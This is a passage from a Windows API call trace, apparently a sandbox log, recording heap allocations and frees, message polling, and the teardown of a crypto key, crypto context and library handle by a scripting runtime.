hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.089] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0269.089] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0269.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0269.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.090] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0269.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0269.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51df0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0269.090] CryptDestroyKey (hKey=0xa87490) returned 1 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0269.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0269.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0269.092] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.092] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.092] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.092] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.092] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0269.093] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0269.093] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0269.093] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0269.093] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0269.093] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.093] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.093] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.093] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.093] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0269.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.094] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0269.094] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.094] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.094] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.094] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0269.094] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.094] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0269.095] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.095] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0269.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0269.095] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0269.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0269.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0269.095] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0269.095] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.096] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.096] FreeLibrary (hLibModule=0x756e0000) returned 1 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.096] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0269.096] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.096] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0269.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0269.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0269.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0269.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0269.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0269.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.097] CloseHandle (hObject=0x2a0) returned 1 [0269.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0269.098] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0269.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0269.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0269.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.099] CloseHandle (hObject=0x2d0) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0269.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0269.101] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: 